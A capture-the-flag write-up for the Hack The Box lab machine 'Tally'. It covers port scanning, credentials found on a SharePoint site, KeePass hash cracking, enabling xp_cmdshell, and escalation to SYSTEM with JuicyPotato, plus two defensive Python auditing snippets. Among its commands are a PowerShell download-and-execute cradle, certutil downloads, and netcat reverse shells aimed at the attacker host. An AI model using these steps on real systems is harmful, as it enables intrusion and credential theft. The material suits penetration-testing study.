Tally

Enumeration
As always, we start with the enumeration phase, in which we scan the machine for open ports and identify the services and versions running on them.
The following nmap command scans the target machine for open ports quickly and saves the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.59 -oN allPorts
-sS              use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000  nmap will try to keep the sending rate at or above 5000 packets per second.
-p-              scan the entire port range, from 1 to 65535.
-T5              insane mode, the fastest of the nmap timing templates.
-Pn              assume the host is online.
-n               scan without reverse DNS resolution.
-oN              save the scan result into a file, in this case the allPorts file.
# Nmap 7.93 scan initiated Mon Nov 7 17:21:56 2022 as: nmap -sS --min-rate 5000 -n -Pn -p- -oN allPorts 10.10.10.59
Nmap scan report for 10.10.10.59
Host is up (0.054s latency).
Not shown: 65514 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
81/tcp open hosts2-ns
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
808/tcp open ccproxy-http
1433/tcp open ms-sql-s
5985/tcp open wsman
15567/tcp open unknown
32843/tcp open unknown
32844/tcp open unknown
32846/tcp open unknown
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
# Nmap done at Mon Nov 7 17:22:10 2022 -- 1 IP address (1 host up) scanned in 14.24 seconds
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p21,80,81,135,445,808,1433,5985,15567,32843,32844,32846,47001,49664,49665,49666,49667,49668,49669,49670 10.10.10.59 -oN targeted
-sC  perform the scan using the default set of scripts.
-sV  enable version detection.
-oN  save the scan result into a file, in this case the targeted file.
# Nmap 7.93 scan initiated Mon Nov 7 17:24:14 2022 as: nmap -sCV -p21,80,81,135,445,808,1433,5985,15567,32843,32844,32846,47001,49664,49665,49666,49667,49668,49669,49670 -oN targeted 10.10.10.59
Nmap scan report for 10.10.10.59
Host is up (0.34s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 10.0
| http-title: Home
|_Requested resource was http://10.10.10.59/_layouts/15/start.aspx#/default.aspx
|_http-server-header: Microsoft-IIS/10.0
|_http-generator: Microsoft SharePoint
| http-ntlm-info:
| Target_Name: TALLY
| NetBIOS_Domain_Name: TALLY
| NetBIOS_Computer_Name: TALLY
| DNS_Domain_Name: TALLY
| DNS_Computer_Name: TALLY
|_ Product_Version: 10.0.14393
81/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
808/tcp open ccproxy-http?
1433/tcp open ms-sql-s Microsoft SQL Server 2016 13.00.1601.00; RTM
|_ssl-date: 2022-11-07T16:25:32+00:00; +1s from scanner time.
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-11-07T16:18:15
|_Not valid after: 2052-11-07T16:18:15
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
15567/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title.
| http-ntlm-info:
| Target_Name: TALLY
| NetBIOS_Domain_Name: TALLY
| NetBIOS_Computer_Name: TALLY
| DNS_Domain_Name: TALLY
| DNS_Computer_Name: TALLY
|_ Product_Version: 10.0.14393
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
| Negotiate
|_ NTLM
32843/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
|_http-server-header: Microsoft-HTTPAPI/2.0
32844/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=SharePoint Services/organizationName=Microsoft/countryName=US
| Subject Alternative Name: DNS:localhost, DNS:tally
| Not valid before: 2017-09-17T22:51:16
|_Not valid after: 9999-01-01T00:00:00
|_ssl-date: 2022-11-07T16:25:32+00:00; +1s from scanner time.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
| tls-alpn:
| h2
|_ http/1.1
32846/tcp open storagecraft-image StorageCraft Image Manager
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2022-11-07T16:25:23
|_ start_date: 2022-11-07T16:17:53
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Nov 7 17:25:33 2022 -- 1 IP address (1 host up) scanned in 79.59 seconds
The website shows a SharePoint application.

Doing some research on the internet, I found a pentest report on SharePoint which lists directories such as /_layouts/viewlsts.aspx.

Inside the Documents folder there is one file called ftp-details.docx.

Let's get the content of the document with the docx2txt tool.
docx2txt ftp-details.docx
cat ftp-details.txt
FTP details
hostname: tally
workgroup: htb.local
password: UTDRSCH53c"$6hys
Please create your own user folder upon logging in
On the other hand, the SitePages folder contains another item.
http://10.10.10.59/SitePages/Forms/AllPages.aspx

The page contains a message with an FTP username called ftp_user.
http://10.10.10.59/SitePages/FinanceTeam.aspx

Exploitation
Now, we have valid credentials for the FTP server.
ftp ftp_user@10.10.10.59
Connected to 10.10.10.59.
220 Microsoft FTP Service
331 Password required
Password: UTDRSCH53c"$6hys
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||50488|)
125 Data connection already open; Transfer starting.
08-31-17 10:51PM <DIR> From-Custodian
10-01-17 10:37PM <DIR> Intranet
08-28-17 05:56PM <DIR> Logs
09-15-17 08:30PM <DIR> To-Upload
09-17-17 08:27PM <DIR> User
226 Transfer complete.
As the content of the FTP server looks big, let's mount it to a directory called ftp with curlftpfs.
mkdir ftp
curlftpfs 10.10.10.59 ftp -o user=ftp_user:'UTDRSCH53c"$6hys'
Inside the ftp/User/Tim/Files/ directory there is one file called tim.kdbx, which is a KeePass database and may contain some credentials.
ls -la ftp/User/Tim/Files/
total 8
---------- 1 root root 17 Sep 15 2017 bonus.txt
d--------- 1 root root 0 Sep 15 2017 KeePass-2.36
---------- 1 root root 2222 Sep 15 2017 tim.kdbx
Let's copy that file to our current directory, get its hash, and try to break it with john.
cp ftp/User/Tim/Files/tim.kdbx .
keepass2john tim.kdbx > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 6000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
simplementeyo (tim)
1g 0:00:00:48 DONE (2022-11-07 20:04) 0.02060g/s 508.7p/s 508.7c/s 508.7C/s simplementeyo..sept17
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Now that we have the password, let's open the password database with KeePassXC.
keepassxc tim.kdbx

There is one entry called TALLY ACCT share with the username Finance and the password Acc0unting.

These credentials are valid for the SMB server.
cme smb 10.10.10.59 -u "Finance" -p "Acc0unting"
SMB 10.10.10.59 445 TALLY [*] Windows Server 2016 Standard 14393 x64 (name:TALLY) (domain:TALLY) (signing:False) (SMBv1:True)
SMB 10.10.10.59 445 TALLY [+] TALLY\Finance:Acc0unting
By listing the shares, we'll see that we can read the ACCT share.
smbmap -H 10.10.10.59 -u "Finance" -p "Acc0unting"
[+] IP: 10.10.10.59:445 Name: 10.10.10.59
Disk Permissions Comment
---- ----------- -------
ACCT READ ONLY
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
Let's create another directory called smb, and mount the ACCT share in it.
mount -t cifs //10.10.10.59/ACCT smb/ -o username=Finance,password=Acc0unting
Inside the smb/zz_Migration/Binaries/New\ folder/ directory there is one binary called tester.exe.
ls -la smb/zz_Migration/Binaries/New\ folder/
total 676316
drwxr-xr-x 2 root root 4096 Sep 21 2017 .
drwxr-xr-x 2 root root 4096 Sep 17 2017 ..
-rwxr-xr-x 1 root root 389188014 Sep 13 2017 crystal_reports_viewer_2016_sp04_51051980.zip
-rwxr-xr-x 1 root root 18159024 Sep 11 2017 Macabacus2016.exe
-rwxr-xr-x 1 root root 21906356 Aug 30 2017 Orchard.Web.1.7.3.zip
-rwxr-xr-x 1 root root 774200 Sep 17 2017 putty.exe
-rwxr-xr-x 1 root root 483824 Sep 15 2017 RpprtSetup.exe
-rwxr-xr-x 1 root root 254599112 Sep 11 2017 tableau-desktop-32bit-10-3-2.exe
-rwxr-xr-x 1 root root 215552 Sep 1 2017 tester.exe
-rwxr-xr-x 1 root root 7194312 Sep 13 2017 vcredist_x64.exe
If we print the strings of the binary, we'll find some credentials for the database server.
strings smb/zz_Migration/Binaries/New\ folder/tester.exe | more
...
DRIVER={SQL Server};SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;PWD=GWE3V65#6KFH93@4GWTG2G;
...
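A connection string with a hardcoded sa password inside a shipped binary is exactly what a secrets scan over a build artifact or a file share audit should catch. The following Python is an added example, not code from the original writeup: it reproduces the strings step over a constructed byte blob (the password is a placeholder), parses any ODBC-style connection string it finds, and reports the login with the password redacted.

```python
import re

# Constructed sample (not the real tester.exe): a few bytes that look like the
# start of a PE file, then an embedded ODBC connection string in the same
# shape as the one recovered above. The password is a placeholder.
SAMPLE_BINARY = (
    b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
    + b"DRIVER={SQL Server};SERVER=TALLY, 1433;DATABASE=orcharddb;"
    + b"UID=sa;PWD=<placeholder-password>;\x00\x90\x90\xcc\xcc"
    + b"Some unrelated printable text\x00"
)


def extract_strings(blob: bytes, min_len: int = 4) -> list:
    """Return runs of printable ASCII of at least min_len bytes, like `strings`."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(blob)]


def parse_connection_string(s: str) -> dict:
    """Split 'KEY=value;KEY=value;' into a dict keyed by upper-cased names."""
    fields = {}
    for part in s.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            fields[key.strip().upper()] = value.strip()
    return fields


def redact(secret: str) -> str:
    """Keep two characters so a reviewer can match the finding, hide the rest."""
    return secret[:2] + "*" * max(len(secret) - 2, 0)


def find_embedded_credentials(blob: bytes) -> list:
    """Scan a binary for connection strings that carry a login and a password."""
    findings = []
    for s in extract_strings(blob):
        fields = parse_connection_string(s)
        if "PWD" in fields and "UID" in fields:
            findings.append({
                "server": fields.get("SERVER"),
                "database": fields.get("DATABASE"),
                "user": fields["UID"],
                "password": redact(fields["PWD"]),
                # 'sa' is the SQL Server built-in sysadmin login.
                "privileged_login": fields["UID"].lower() == "sa",
            })
    return findings
```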
Now we can log in to the MS SQL server on port 1433 with the mssqlclient tool from Impacket.
impacket-mssqlclient sa@10.10.10.59
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password: GWE3V65#6KFH93@4GWTG2G
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(TALLY): Line 1: Changed database context to 'master'.
[*] INFO(TALLY): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (130 665)
[!] Press help for extra shell commands
We could try to run commands with xp_cmdshell, but it is disabled.
xp_cmdshell whoami
[-] ERROR(TALLY): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
But we can enable it with the enable_xp_cmdshell command of the mssqlclient shell.
enable_xp_cmdshell
xp_cmdshell whoami
output
--------------------------------------------------------------------------------
tally\sarah
NULL
Time to get a shell. First, download the Invoke-PowerShellTcp.ps1 file from Nishang and append the following call to the function at the end of the script, so that it runs as soon as the script is loaded. I will rename the file to rv.ps1.
mv Invoke-PowerShellTcp.ps1 rv.ps1
nano rv.ps1
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.8 -Port 4444
Now, set a netcat listener on port 4444 with rlwrap.
rlwrap nc -lvnp 4444
-l  listen mode.
-v  verbose mode.
-n  numeric-only IP, no DNS resolution.
-p  specify the port to listen on.
And set a simple HTTP server with python on the current directory.
python -m http.server 80
Now, if we run the following command, we should get a reverse shell as the sarah user, and then we'll be able to grab the user flag.
xp_cmdshell powershell IEX(New-Object Net.WebClient).downloadString("http://10.10.14.8/rv.ps1")
Listening on 0.0.0.0 4444
Connection received on 10.10.10.59 50694
Windows PowerShell running as user Sarah on TALLY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32>whoami
tally\sarah
PS C:\Windows\system32> type \users\sarah\desktop\user.txt
26bf3a939acfe12a9088270ea0fe2d21
Privilege Escalation
Let's start by seeing what privileges our current user, sarah, has.
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
If a user has SeImpersonatePrivilege, the first thing that comes to mind is JuicyPotato.
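As an added example (not from the original writeup), the following Python parses the whoami /priv table above and flags the privileges that matter for this kind of escalation, so the same check can be run over output collected from service accounts during an audit. The sample input is a constructed copy of the output shown above.

```python
import re

# Constructed sample in the shape printed by `whoami /priv` above.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Privileges that let a low-privileged service account reach SYSTEM-level
# access on their own, so a token holding them deserves a closer look.
HIGH_RISK = {
    "SeImpersonatePrivilege": "impersonate clients that authenticate to the process (the JuicyPotato path above)",
    "SeAssignPrimaryTokenPrivilege": "assign a different primary token to a new process",
    "SeDebugPrivilege": "open and manipulate any process, including SYSTEM ones",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load kernel drivers",
}

# One table row: name, free-text description, then Enabled/Disabled.
_ROW = re.compile(r"^(Se\w+Privilege)\s+(.+?)\s+(Enabled|Disabled)\s*$")


def parse_whoami_priv(output: str) -> list:
    """Turn the text table into a list of {name, description, state} rows."""
    rows = []
    for line in output.splitlines():
        m = _ROW.match(line)
        if m:
            rows.append({"name": m.group(1), "description": m.group(2), "state": m.group(3)})
    return rows


def audit_token(output: str) -> list:
    """Return every high-risk privilege held by the token.

    A privilege in the Disabled state is still present in the token and can be
    re-enabled by the process at will, so both states are reported."""
    return [dict(row, why=HIGH_RISK[row["name"]])
            for row in parse_whoami_priv(output) if row["name"] in HIGH_RISK]
```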
To escalate privileges, we'll have to transfer the JuicyPotato.exe and nc.exe binaries to the victim machine. Let's set a python HTTP server on the directory where we have those binaries.
python -m SimpleHTTPServer
And download the binaries on the victim machine with certutil (the JuicyPotato command below expects nc.exe in C:\windows\temp\privEsc).
certutil.exe -f -urlcache -split http://10.10.14.8:8000/JuicyPotato.exe JuicyPotato.exe
certutil.exe -f -urlcache -split http://10.10.14.8:8000/nc.exe nc.exe
Before executing the JuicyPotato.exe binary, let's set another netcat listener on port 5555 to catch a reverse shell as the NT AUTHORITY\SYSTEM user.
nc -lvnp 5555
-l  listen mode.
-v  verbose mode.
-n  numeric-only IP, no DNS resolution.
-p  specify the port to listen on.
Finally, let's run the Juicy Potato binary and get a shell as the NT AUTHORITY\SYSTEM user. Then all we have to do is reap the harvest and take the root flag.
JuicyPotato.exe -t * -l 1337 -p C:\Windows\System32\cmd.exe -a "/c C:\windows\temp\privEsc\nc.exe -e cmd 10.10.14.8 5555"
-t  createprocess call (* tries both CreateProcessWithTokenW and CreateProcessAsUser).
-l  COM server listen port.
-p  program to launch.
-a  specify command arguments.
Listening on 0.0.0.0 5555
Connection received on 10.10.10.59 50731
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>type \users\administrator\desktop\root.txt
7850cfbb5ab1ddefb5406ff662fecec7